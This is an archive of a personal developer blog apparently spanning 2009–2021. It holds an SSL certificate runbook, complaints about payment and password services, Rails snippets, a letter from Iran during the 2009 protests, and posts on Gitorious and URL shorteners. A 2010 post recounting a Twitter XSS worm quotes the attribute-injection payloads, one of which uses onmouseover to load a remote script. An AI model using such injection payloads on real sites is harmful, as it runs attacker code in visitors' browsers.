Inspired? No

Wildcard SSL-certificate on Heroku and CloudFront

2021-05-26T14:39:00+02:00

Purchase SSL.
I use Comodo PositiveSSL Wildcard from SSLs.
Activate certificate
Generate private key: openssl genrsa -aes256 -out server.pass.key 2048
While you can use a 4096 key on Heroku the max key length on CloudFront is 2048.
Save passphrase to password manager.
Strip away password: openssl rsa -in server.pass.key -out server.key
Generate CSR: openssl req -nodes -new -key server.key -out server.csr
FQDN: *.example.org
Challenge password: only digits and letters
Save challenge password to password manager
Enter CSR at SSL reseller: cat server.csr|pbcopy
Approve via link in received email.
Receive certificate by email
Comodo:
Unzip
RapidSSL:
Save webserver.crt: pbpaste > webserver.crt
Save intermediate: pbpaste > intermediate_ca.crt
Create SSL certificate
Comodo:
cp STAR_example_org.ca-bundle bundle.crt
cat STAR_example_org.crt bundle.crt > ssl.crt
RapidSSL:
cp webserver.crt ssl.crt
cat intermediate_ca.crt >> ssl.crt
Verify cert is generated correctly: openssl x509 -in ssl.crt -text -noout
Update Heroku certificate
heroku certs:update ssl.crt server.key -a your-app
Create new CloudFront certificate
aws iam upload-server-certificate --server-certificate-name new_star.example.org --certificate-body file://STAR_example_org.crt --private-key file://server.key --certificate-chain file://bundle.crt --path /cloudfront/
Update references from CloudFront distributions to new CloudFront certificate
Delete old CloudFront certificate
aws iam delete-server-certificate --server-certificate-name star.example.org
Rename new CloudFront certificate
aws iam update-server-certificate --server-certificate-name new_star.example.org --new-server-certificate-name star.example.org
Delete certificate emails.
Save all files to password manager and delete them on disk.

Be silent customer

2013-11-15T00:00:00+01:00

I tweeted about password being sent in clear text from Adyen (a payment service provider). They called me up and told me I could not be a customer since I tarnished their reputation.

I have been looking for a good payment service provider for a while now. My startup MakePlans has many small customers so a pay-as-you-go pricing model was a requiment in addition to good APIs. Basically I want to use Stripe but they are not yet available in Norway.

So I stumpled upon a provider called Adyen. Their API documentation is in a PDF, parts of which you have to ask for via email. They mainly use SOAP but also have a REST API. There are no libraries, few code examples and their GitHub account has very little activity. I should have seen the warning signs there. The typical non-developer way of doing what is in practice a IT-based implementation. The very reason why I have been waiting for Stripe and looking at Braintree (unfortuantely they introduced a €100/month requirement).

I talked to a contact person at Adyen who was very nice and was willing to decrease their usual requirements of 1000 transactstions per month to 100 for our clients who are small hairdressing salons and doctor offices (so new to e-commerce and will be doing small volumes). Their pricing was also very good (much cheaper than Stripe). So I decided to implement a simple prototype. The signup process for a test account is not a form on their website as you would expect but instead you have to give details via email. Ok so I did so. Then I received an automated email with username and password for the account in clear text in the email. Now if this was a dating site I would be dissapointed with such a practice. But for a payment provider who shall secure online payments and store credit card details it is a big warning sign with how they have secured their application when they send credentials via email. So what did I do? Well I tweeted about it off course.

Testing Adyen as a payment gateway and they send me password via email and cc to my contact person there. Great start!
— Espen Antonsen (@Espen_Antonsen) November 13, 2013

Then I received an email from my contact who wanted to have a chat about the Twitter conversation (I also was in contact with their support on Twitter and I assumed he was referring to that). During the call I was told that the management was not happy with my tweet and did not want customers to express their opinions on Twitter but instead contact them directly. My tweet was damaging to their reputation and they did not want me as a customer.

I assume there are old men from the finance industry involved in this decision but I also assumed even they were aware of the norm and power of social media these days. If customers, or potential customer in this case, are unhappy they will tell people on Twitter or Facebook. And to deny a customer because of expressing an opinion on Twitter? Perhaps these guys should move to North Korea and continue their business there? To top it off, in this case it was not some shit-throwing rambling but rather pointing out a practice that is considered unsecure by anyone who has knowledge about building secure web-applications (btw we just implemented two-factor authentication in MakePlans, perhaps that is something you should spend your time on instead of discussing ‘negative’ tweets Adyen). The email was also cc’ed to my contact person at Adyen who should not see my password. Nobody should.

As an added bonus here is a screenshot of their back-end administration. Hello 1999.

How not to treat passwords

2012-07-14T00:00:00+02:00

I have been using Dashlane as a password manager as I though 1Password was a bit too pricey given there are many half-decent free alternatives.

Saving new accounts and authenticating automatically worked really well with Dashlane. I would say it is even smoother than 1Password. There were however instant turn-offs. Passwords are very obviously very important. When dealing with passwords you probably don’t want to use humour or other simpler ways of interacting with your application or the way you market your product. Dashlane has other thoughts. They use gamification heavily in their application. To unlock features you need to annoy your friends on Twitter or Facebook about their application. And it continuously asks you to get more points by filling out the profile and other tasks. This behaviour should have resulted in an uninstall for me but as it was free and every day usage of logins were working well so I continued using it. Not a good idea.

I had also installed their iPhone-app. It is a horrible piece of software as was their Safari extension until very recently, using 100% cpu on my MacBook. The iPhone-app would take about 5 minutes to decrypt data. This occurred on every launch. So unusable. Thus I decided to delete it and to delete all my data that they had stored on their servers, as sync goes through their server. Data is also available by logging in on their website. So I sent a request to support: “Can you please delete my account and delete all my data.”.

They did. And then I was going to use Dashlane on OSX and my data was gone. Dashlane promotes sync as an added feature and something to be enabled from the local application. It does not seem to be a key core part of how the service operate, but it is. In fact the local account is based on the account on the server and Dashlane has a kill switch to the local data. That is not the way to treat passwords. And there is no way to get it back. They have no backups locally (1Password does a backup every day and keeps it for 30 days).

Also, funny how using a password manager that is supposed to securely save all my passwords and not have me think about them anymore led me to lose all my passwords.

Lesson learned again: “If you are not paying for it; You’re the product”

Fuck you, let me pay you

2012-04-12T00:00:00+02:00

For my online scheduling and appointment booking application MakePlans I have implemented SMS reminders. So if you book with a hairdresser you will get a SMS the day before your appointment reminding you about your reservation. This is helpful for the customer and helps businesses reduce no-shows. After some research I ended up using Clickatell as a provider mainly due to their flexible prepaid pay as you go pricing. Other alternatives required a registration fee as well as a fixed monthly fee. But this was a couple of years ago and now there are some new players in the market offering very cheap SMS, most notably Twilio and Tropo. Unfortunately neither of them were able to fully support international messages or specify a custom sender-id. So I had to continue using Clickatell and top-up my account with some credits. Easier said than done. After entering my details and amount to be paid I was presented with the the error “declined payment”. After trying to pay with both my MasterCard and Visa card I suspected something was wrong on their end and contacted support. And this was the respond I received:

"Dear Espen,  Thank you for contacting Clickatell.   Your card is being declined by our payment gateway as the originating IP Address for the payment does not match up to the card's country of issue.   Kindly place a payment within the country of issue in order for your card to be accepted."

I am from Norway but have lived in Kuala Lumpur for a year. Obviously flying back to Norway to pay $100 to send a few text messages was not option. I replied to Clickatell saying so and received this reply:

"We need to see a recent bank statement for the credit card used for your latest transaction.   The following information has to be visible on the statement:  The name and address of the card holder,  The last four numbers on the credit card,  The name of the bank..."

I am not really interested in contacting my bank to get a bank statement just to pay a supplier.

As a developer who travels a lot I find this policy customer hostile, puzzling and outdated. While I do understand Clickatell needs to protect themselves from credit card fraud this is not the way to do it.

So what happened after this? Well I did some further research on alternative providers and it seems a found a great one. Hoiio is similar to Twilio but in addition to low costs and a sensible API they can deliver to most countries and specify sender-id in messages. They are based in Singapore and while signing up for a trial at 10pm local time on a Sunday night I emailed support with a question. Just minutes later I receive a reply from the API lead developer. I’m switching.

Post title inspired by Mike Monteiro

XSS vulnerability on twitter.com

2010-09-21T00:00:00+02:00

So Judofyr found a XSS-exploit on Twitter.com and within minutes it spreaded like wildfire. His original tweet just set the anchor background color to black but his next tweet included onmouseover and people could not stop moving the mouse over the tweet resulting in over 40000 tweets within 10 minutes.

The exploit: http://judofyr.net/@"style="background:#000;color:#000;/

So Twitter does not encode the URL and whatever is after the @ gets included in the anchor. So css and javascript can be included.

Shortly after someone else created a more evil approach:

http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A ...

Rails photo gallery Balder on Heroku and S3

2010-09-03T00:00:00+02:00

A while ago I published a open source photo gallery built with Ruby on Rails. You can find more info on balderapp.com or on the GitHub repository. I have now updated this to a new version which supports S3 storage and so it can run off Heroku (which has no file storage, just a database). Heroku is a really nice free hosted ruby platform and it is very easy to put up simple apps on it as this blog post will demonstrate. Just sign up for Heroku and S3 and type of a few commands in terminal and you are ready to go!

create S3 account

create heroku account

open terminal

git clone git@github.com:espen/balder.git

cd balder

Edit config/balder.rb: uncomment heroku & s3 settings. Insert your S3 credentials.

git commit -a -m ‘settings’

sudo gem install heroku

heroku create APPNAME

git push heroku master

heroku rake db:migrate

heroku open

enjoy

Why Rule.fm sucks

2010-07-13T00:00:00+02:00

Comments on my blog post about 37Signals’ Basecamp

Dare I say rolling the wrong way?

2010-06-10T00:00:00+02:00

It’s a few short days after the keynote, and what strikes me is that we haven’t seen what Gruber promised us. No never-before-seen features in OS4. No new Apple TV (Ok, so he was right about the iPhone HD and Safari extension API with Reader).

It was one hell of a post.

FacePalm

2010-06-08T00:00:00+02:00

The future is here according to Steve Jobs. Maybe he should tell Pixar to make “Back to the Future 4” cause there sure were a lot of “time travellers” who tried video-calling five years ago.

Video calling is fun. Once. Then you never use it again. Im surprised Apple is pushing FaceTime the way they are. This is definitevely not a techincal revolution. But neither was the iPod. We had mp3-players before. But the iPod made it easy to listen to music on the go. My old Nokia 3G-phone had the same “video-call” button as the iPhone 4 has. So Apple is not making it easier. It was easy, but not useful. I don’t see how this will change everything. Again.

At first I laughed at this being WiFi-only even though Steve Jobs said they were working with carriers to support it on (I really wish he would just say AT&T instead of carriers though. Carriers over here in Norway have no problem with 3G video-calls or tethering.) I’m no expert on telecom specifications but I believe the video-calling is part of the 3G-standard. That’s why it works on all types of phones. So why is not Apple using this? Cause it is 3G-only. Apple wants video calling to be ubiquitous: phone to phone, phone to computer, iPad to computer. If Apple had chosen to use the 3G-standard video-calling then it would have only worked from iPhone 4 to all other 3G phones, not to other devices over the net. So is Apple going after some of Skype’s market here? For many video calling is the entry to Skype. Then they continue to use it and pay for skype to phone.

With this new standard they are making public, Apple must wait until other phones support it. That surely hinders the success of this feature. Even if people suddenly start to make video calls, how many people can you call with your iPhone 4 within the first year?

Prioritize database search results with Searchlogic (Ruby on Rails)

2010-03-04T00:00:00+01:00

This is why I love ruby. With one simple line I can combine two arrays and filter out duplicates. Here I have used Searchlogic which provides a simple ruby syntax for creating SQL queries. This will execute two SQL queries to the database and combine both resultset but the first query will be presented before the latter. My goal was to search for one parameter in a range of fields, but I wanted to prioritize those results where the paramater exists in more important columns such as name and title. If the parameter is found in columns like description it will be presented at the end of the combined resultset.

def self.search(search) return (self.firstname_or_lastname_or_area_or_title_like(search) + self.bio_or_description_like(search) ).uniq end

Get Flickr Id and display photos with Hpricot in Ruby on Rails

2010-02-26T00:00:00+01:00

To utilize the Flickr API you need the Flickr Id not the Flickr username. I have not found a method for finding the Flickr Id based on username in the Flickr API, so I have created a simple scaping method that find a hidden form field in the Flickr profile for a specified user.

This code assumes you have a model with attributes ‘flickr’ (flickr username) and ‘flickr_id’. It will trigger whenever ‘flickr’ is updated and then set ‘flickr_id’.

First you need the Hpricot gem: sudo gem install hpricot

before_update :flickr_change

def flickr_change if self.flickr_changed? require ‘hpricot’ require ‘open-uri’ doc = open(“http://www.flickr.com/people/#{self.flickr}/”) { |f| Hpricot(f) } f = doc.search(“//input[@name=’w’]”) unless f.empty? && !f.first self.flickr_id = f.first.attributes[‘value’] else self.flickr = nil self.flickr_id = nil flash[:error] = “Unable to find Flickr username” raise “Unable to find Flickr username” end end

rescue OpenURI::HTTPError => e puts “The page is not accessible, error #{e}” self.flickr = nil self.flickr_id = nil self.errors.add(:flickr, “not found”) end </code>

Then in my person_helper I have create a little method that will return a hash with the 10 latest photos. The extras parameter takes a comma seperated value for setting which values to return. I have specified to return the URL for square and small photo sizes. See the Flickr photo search method in the API for more info.

def flickr_photos(person) require 'open-uri' doc = open("http://api.flickr.com/services/rest/?method=flickr.photos.search&api_key=YOUR_API_KEY&user_id=#{person.flickr_id}&per_page=10&extras=url_s,url_sq") { |f| Hpricot.XML(f) } return doc.search("//photo").collect{|p| { :title => p.attributes["title"], :url_sq => p.attributes['url_sq'], :url_s => p.attributes['url_s'] } } end

If you prefer Ruby syntax instead of using Hpricot to generate and process requests you could use one of the Flickr gems that are available: Flickraw and Flickr_fu. I had problems installing then when using Ruby 1.9 so I made the small script above instead.

If you just want to get your own Flickr Id you can use idgettr.com

The Entrepreneur Tax that Kills Business

2009-11-20T00:00:00+01:00

This is a cross-post from my contribution at CloudAve.com

All governments, including the Norwegian, talk at length about how to stimulate growth among small businesses and the need to focus on innovation. To accomplish their goals various schemes are offered; grants, tax reductions or state backed industry plans. But while other governments try to help small businesses, the Norwegian government at the same time slaps entrepreneurs with hefty taxes. In Norway if you own shares in a company you will be taxed purely based on the ownership and the value of your share. And im not talking about tax from any income you may receive if you are employed at the company, sale of those shares or dividends from those shares (that would be income taxes at 28% for sale of shares and dividends). No; the tax system in Norway includes personal asset taxation based on the value of the company that person own shares in. So if you own 50% of a $10 million company then you will be taxed 1,1% of that value ($5 million) = $55 000. Yearly.

So picture this: you have a great startup going. Bootstrapped to the max, customers rolling in giving your servers barely any time to rest and your competitors are left stranded. The company share value skyrockets on the stock exchange while the entrepreneurs are eating at McDonald's because they would rather use the money on new servers instead of nice cars, Russian caviar and French champagne. Then the tax-man arrives. "Well hello there, you owe me a big pile of money". The entrepreneur doesn't really understand this and replies: "but my salary is $3000/month and have not taken out any dividends from the company". Mr. tax-man laughs: "Hah, well this is Norway and here you must pay 1,1% asset tax based on the company value, no matter if the company is profitable, has any income at all, or if the current stock value happens to be significantly lower than our tax-claim based on share values from way back last year."

This is not fiction. Last month I received my tax returns which included an invoice for $6000. Last year I had no income whatsoever as I spent my time trekking up in the Himalayas, snowboarding in Iran, doing yoga by the Ganges and heaps of other stuff during my ten-month trip. While having a blast I also kept on to my shares in 24SevenOffice (ERP/CRM solution which I co-founded). And based on the value of the shares (2007 pre-financial crisis) this resulted in my tax fees. So if I wanted to sell some shares to cover my tax fees now that would be at half the price compared to the share value which the tax fee was based on. Either way it is a tax claimed on money I do not own or have earned (at least yet). It might actually be money I will never see if the company goes bust.

This year I started for myself, doing some freelancing as well as starting a new venture called MakePlans (a booking/reservation system). I would like to spend my income from freelancing ensuring continuous development of MakePlans. Also I would like to continue to hold shares in 24SevenOffice. But the result of this entrepreneurial tax is that I either have to get a loan in the bank or sell off some of my shares, possibly even to a competitor or a foreign investor. Which I assume is not what the Norwegian government wants or is beneficial for the software industry here in Norway. And that is the tragedy of this type of taxation. Not that I have to borrow some money to cover my bills, but that it is actually bad for businesses. And that is not good for the government which is not good for the society. Me having to pay this tax has a negative impact on the health system, educational offerings and all other operations from our tax-funded government.

Now $6000 is not something to file bankruptcy for. I can manage it. But lets assume that the Swedish music-streaming success and great service Spotify was started in Norway. Techcrunch reports their value at $250m. Lets also assume that founder Daniel Ek owns 20% (actually I would think he has a larger share). With a 1,1% asset tax this results in a $550 000 bill to the Norwegian government. And this should be paid by a person who owns shares in a company that is yet to make even one dollar in profits. Now that is something to be worried about.

Balder - Open source photo gallery built with Ruby on Rails

2009-11-09T00:00:00+01:00

So you got lots of photos, yeah? Tried installing some PHP-gallery and it sucked? Or bought a Flickr Pro-account but want more control of how your photo collection is displayed (or still want access to your data when you stop paying them)? Fear not; Balder is here for the rescue.

As a result of a project with two photographers I did this summer I have now open sourced the code and named it Balder. It is a photo gallery built in Ruby on Rails. It aims to be minimalistically beautiful and simple to use. Look at it as Flickr on your own server - without the social features that is.

So what can it do?

Organize in albums (as events in iPhoto)
Combine albums in collections (as albums in iPhoto)
Stores photos to disk in folders
Create multiple thumbnails of custom sizes
Read and writes EXIF/IPTC title, description and keywords
Upload multiple photos in one go (can also scan existing folder structure)
Tag photos. Can also tag albums (or the result is that all photos in the album is tagged)
User management with roles and permissions
Geo-location of albums & photos with Google Maps integration.

If you want to see it in action look no further than to this domain. After my 10-month trip in 2008 I took a few photos and you can see a selection at photos.inspired.no.

And this is how it looks for the administrator:

Upload multiple photos with live progress:

Add albums to collection:

Want to try it out? Head over to BalderApp.com for this free open source Ruby on Rails photo gallery or go directly to the source-code which you can find at both GitHub and Gitorious.

This just in: Photos taken as hostages on Flickr

2009-06-23T00:00:00+02:00

Johan is in the same situation as me; had Flickr Pro for a while and didn’t really feel the need to continue it. My pro account expired in April and I should have backed up all my photos because now I have to pay $24,95 to be able to do so. With a free account only the latest 200 photos are available. Not only public but in the organization tool in Flickr as well as the API.

This is a very good example of the type of problems that exists with storing data in the cloud. We as users must demand access to our own data, whether we continue to pay for the service or not.

I am making a photo gallery myself and it is currently in beta. I plan to include an import function that will utilize the Flickr API; download the most recent photos and delete them when their saved on my own server. This way I should be able to get out all of MY photos.

A letter from Iran

2009-06-18T00:00:00+02:00

hi espen

how r u? here every things is close. thats why i cant come on line in face book.even messenger... just very slowly smtimes yahoo.... sms is close. and most of day even phones r close...

what can i say about their violence? u cant even emagine that... plz tell me what things u want to know?

just i can say here is hill. everybody that u ask elected musavi... but see... its very hard when u know they r cheating u and u cant even shout or say give my right. all over the city is full of souldures and polices and.... some of them r from libenan, its funny that he pay money to arabic people to kill and beat iranian coz they want their right.

every day we go to protest... every night people r out...some with car and some walking.... they bleep to show their opositions.

i dont know what will happen to us...! but this not humanity.

today was the cermoney of people who died, they killed... and there r too much more the ones who r arrested and in prison they persecute them... i saw manythings by my eyes, they beated me too just coz i was walking in street...

any way, im really not good. i feel very sad now and dont know what can we do?!!!

they dont want even to count again , even if they do now its not reallity. they changed everythings... and our leader khamenei send congradulation to ahmadi nejad!

in saturday, counting finished in 2 oclock but they called on 8 oclock, before it get finish. 24 million... really funny. in all newspaper that reacived in our hand at 11,(3hours before counting finish) they said ahmadi nejad was win...

so they think people r stupid. but this time nobody accepted. but unfortunally just in tehran. coz people in other cities dont have risk and they affraid, if they beat one of them they even dont come out. and in tehran also, how do u think? how many days more people can come out and protest and...?!!!!!! they r dictator. finally they will get tired and force to accept, same as always...

before election i talked with many people in all cities... %80 said musavi... how can it be possible?!!! and if they r right, why they dont care about people who r shouting give back my vote? its not election, its selection......? why all phones r close? why they kill? they dont let people show....

and these people who r out r %20 of opositions. for example arround me, everybody elected musavi, but now they dont come out,they affraid... so, see this %20... everybody who can think, understand its rigging.

actually people r tired of this regim. musavi was a excues that they come out against of them.we didnt have too much choise.and all of our choises force to work for this government and regim,they have to.so we had to choose between them. but for sure every one of them would be better than ahmadinejad.

any way, u say about there and ur news about iran there and other places. what and how do u feel about it and what will happen from ur side?

take care

hi espen

how r u? here every things is close. thats why i cant come on line in face book.even messenger… just very slowly smtimes yahoo…. sms is close. and most of day even phones r close…

what can i say about their violence? u cant even emagine that… plz tell me what things u want to know?

just i can say here is hill. everybody that u ask elected musavi… but see… its very hard when u know they r cheating u and u cant even shout or say give my right. all over the city is full of souldures and polices and…. some of them r from libenan, its funny that he pay money to arabic people to kill and beat iranian coz they want their right.

every day we go to protest… every night people r out…some with car and some walking…. they bleep to show their opositions.

i dont know what will happen to us…! but this not humanity.

today was the cermoney of people who died, they killed… and there r too much more the ones who r arrested and in prison they persecute them… i saw manythings by my eyes, they beated me too just coz i was walking in street…

any way, im really not good. i feel very sad now and dont know what can we do?!!!

they dont want even to count again , even if they do now its not reallity. they changed everythings… and our leader khamenei send congradulation to ahmadi nejad!

in saturday, counting finished in 2 oclock but they called on 8 oclock, before it get finish. 24 million… really funny. in all newspaper that reacived in our hand at 11,(3hours before counting finish) they said ahmadi nejad was win…

so they think people r stupid. but this time nobody accepted. but unfortunally just in tehran. coz people in other cities dont have risk and they affraid, if they beat one of them they even dont come out. and in tehran also, how do u think? how many days more people can come out and protest and…?!!!!!! they r dictator. finally they will get tired and force to accept, same as always…

before election i talked with many people in all cities… %80 said musavi… how can it be possible?!!! and if they r right, why they dont care about people who r shouting give back my vote? its not election, its selection……? why all phones r close? why they kill? they dont let people show….

and these people who r out r %20 of opositions. for example arround me, everybody elected musavi, but now they dont come out,they affraid… so, see this %20… everybody who can think, understand its rigging.

any way, u say about there and ur news about iran there and other places. what and how do u feel about it and what will happen from ur side?

take care [name removed]

Engelab Iran

2009-06-17T00:00:00+02:00

I spent three months in Iran last year and got introduced to the most welcoming people I have ever met on my travels. Iranian hospitality is legendary and was impressive by both the young, rich and liberal in north Tehran as well as large poor families in conservative rural towns. I also made some good friends there who I keep thinking of while these current events keep escalating.

Me and two Italian friends had dinner at Naghsh-e Jahan Square in Isfahan. The second largest square after Tiananmen square in China. The three girls on the next table were pretty and not at all shy. They showed us around town and bought us lunch (no argument there).

And this is what it looked like today, filled with brave Iranians fighting for their rights and for their vote to count.

My friends in Isfahan went to the university and lived at the dormotories. Earlier today there were reports of attacks on the dormotory there and this video confirms it. I hope they are ok.

Most people see Iran as an axis of evil. A dangerous place. With fanatical and religious people. I have written before about the truth about Iran and its people. But even so I am surprised about the turnout of these demonstrations and how brave the people are for standing up to their government. When I was there I tried talking to people about the problems that exists because of their leader and the way the state is structutured. Most people were very dissatisfied with the government but they seemed to be very apathatic about making any changes. They tried to live their lives and kept their joys in private. Maybe this time the government pushed too far with their fraud. Or maybe they saw that when (even) America can CHANGE so can Iran. Another thing to remember is that Iran tried this 30 years ago. These events are in some ways very much alike to what happened when Khomehni took power. The people were dissatisfied with the Shah (king) and wanted a true democracy. Khomehni promised it but as we all now did not live up to his words. The result is that Iranians have until now been very reluctant to make such a major change again.

These events also make me think how lucky my timing was last year. I was in Tehran in early 2008 and suddenly there was an election which was all new to me. But it was a local election. I went out on the streets to check it out but it was a ghost town except for a small crowd of 50 people outside the university where the voting booth was. One old man shouted “Bush - monkey. Bush - monkey” and I smiled and said “balle” - “yes”. Earlier that month another important event occurred in Tehran - the day of the revolution. About a million conservative Iranians parades in the streets along with me and two Norwegian girls. But it was a peaceful day out for families and people were smiling.

While I am worried for my friends in Iran and worried that the demonstration will be cracked down upon without any result, or maybe even for the worse, I am still glad to see these events occuring. A change for a slightly more liberal president is not enough. A revolution is needed.

Engelab Iran - Azadi.

Revolution Iran - Freedom.

Google releases Page Speed for Firebug

2009-06-04T00:00:00+02:00

Users of the excellent Firebug debug tool for Firefox probably also uses YSlow, a performance analyzer from Yahoo! It gives good tips for decreasing page load time such as gzipping static files or combining javascript files. Google has now released a similar add-on for Firebug called Page Speed. It is very similar to YSlow but it also introduces a new tab feature called”Page speed activity”, a request overview, and in addition to giving performance suggestions it also tells you the improvements of implementing the suggested changes.

You can find Page Speed over at Google Code.

Let them all win..

2009-05-20T00:00:00+02:00

Quite a diplomatic result for the winners in the “browsing” category in CNET’s Webware 100: Firefox, Flock, Google Chrome, Internet Explorer 8, Maxthon, Opera and Safari. In addition to all the browsers and browser-shells Diigo, iGoogle and XMarks won as well.

I suggest that CNET drops this category.

Gitorious - free open source git project hosting

2009-05-11T00:00:00+02:00

GitHub is a very popular repository hosting for open source ruby projects. Git is a version control system similar to (but a lot better than) SVN. I use git hosted on GitHub for my current project, MakePlans - a booking/reservation system. But for many is GitHub not a viable alternative since it is not free for non open-source projects and while it is great for many to outsource backups and repository management, it is not an option for those who needs to host it in-house due to security or other internal guidelines.

Enter Gitorious!

Johan Sørensen from Shortcut, a ruby on rails company here in Oslo, made this amazing free open-source “GitHub-clone” (update: Gitorious was launched the same week as GitHub.). It has been available as a open-source project for awhile but recently Shortcut made a free public site available for those who do not want to install Gitorious themselves.

Gitorious boost most of the features that GitHub has:

Host git-repositories.
Visual source browser.
Teams.
History of the commit log.
Clone/fork projects, download zipped file.
Comments.
Notficitation system.

On a day to day basis the source tree browser is what I most often use with GitHub. It is ajax-based and loads commit messages after the rest of the page is loaded. This is often a slow process in GitHub and something that works much better in Gitorious where no ajax is used.

There is not much I miss from GitHub, but I cannot see a way to constantly watch others repositories as is possible in GitHub. I follow various rails-projects in GitHub but I use it mainly as a form of bookmark so it is not a very important feature for me.

QT announced today that they will use Gitorious as their public repository for their cross-platform UI framework. Hopefully more will follow so Gitorious can gain the attention it deserves compared to GitHub.

The Problem with URL Shorteners: ow.ly Server Errors

2009-04-14T00:00:00+02:00

This is a cross-post from CloudAve.

If you currently click on a ow.ly shortened URL you will be shown a server error page at ow.ly - not the URL you or the publisher intended you to see. Proponents of these services have so far ignored the main problem; trusting a third party. I guess they see the problem now when potential visitors to their site are stopped by a server error on someone else’s site. The question of trust in this regard is especially important because these services has no working business model. Also any developer can create such a service in less than an hour making the barriers of entry for this service extremely low. Expect to see URL shortener services changing their tactics: Digg launched their already much hated DiggBar last week. This service unlike most other url shortener services wraps the actual landing page in a frame and adds a top-frame bar with Digg information. Ow.ly is also now doing this (unsure if this feature is new to this service). The problem for site owners is that they have no control over how these services will change. DiggBar is already “stealing” link-juice by having a digg-shortened link on Delicious instead of the original url. Also DiggBar and Ow.ly responds with a frameset (200 http status code) instead of a redirect (301 http status code). This can result in a lower pagerank as Google will not see the link from “Site X” to “Site Y” but instead from Digg.com to “Site Y”. In my view URL shorteners are just plain evil. They add an extra unnecessary layer on the web.